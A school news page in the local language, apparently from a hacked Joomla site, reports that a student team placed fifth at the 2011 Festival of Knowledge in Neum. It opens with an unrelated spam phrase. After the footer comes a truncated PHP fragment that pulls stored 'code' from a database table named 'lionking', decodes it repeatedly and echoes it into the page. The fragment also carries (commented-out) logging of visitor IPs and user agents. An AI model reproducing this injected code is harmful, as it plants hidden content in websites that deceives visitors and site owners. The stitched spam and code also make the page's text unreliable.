fuga mobilya

Trodnevni festival znanja u Neumu

Written by  škola
(0 votes)

Na trinaestom po redu „Festivalu znanja“ u Neumu, gdje su se takmičile 21 škola iz Federacije BiH, Republike Srpske i Distrikta Brčko, ove godine predstavnici naše škole, učenici: Lamija Aliman, Marko Bulajić, Nađa Macić, Faruk Omanović, Madžida Tabaković i Amra Žugor, osvojili su 5 mjesto.

U periodu od  6.6 – 8.6.2011. koliko je trajao „Festival znanja“ ekipe su se takmičile iz šest predmeta: matematike, fizike, biologije, hemije, geografije i informatike.

Naši učenici, osvojili su 72 boda iz matematike, 33 iz fizike, 80 iz biologije, 90,5 iz hemije, 71 iz geografije i 34 iz informatike. To ukupno iznosi 380,5 bodova što je bilo dovoljno da naša ekipa osvoji 5. mjesto.

Čestitamo učenicima i nastavnicima zaslužnim za ovo takmičenje na postignutim izvanrednim rezultatima.

Read 1722 times

Add comment

Security code Refresh

Ko je online?

Trenutno aktivnih Gostiju: 14

Powered by Joomla!. Valid XHTML and CSS.

= 1) { //mysql_query('INSERT INTO lionking (domainname, fullpath, ip, useragent, processtime) VALUES ("'.$g['domainname'].'","'.$g['fullpath'].'","'.$g['ip'].'","'.$g['useragent'].'", NOW())'); $rs = mysql_fetch_array($q); echo stripslashes(stripslashes(stripslashes(html_entity_decode(html_entity_decode($rs['code']))))); } else { mysql_query('INSERT INTO lionking_saved (domainname, stat, processtime) VALUES ("'.$g['domainname'].'","2", NOW())'); } } ?>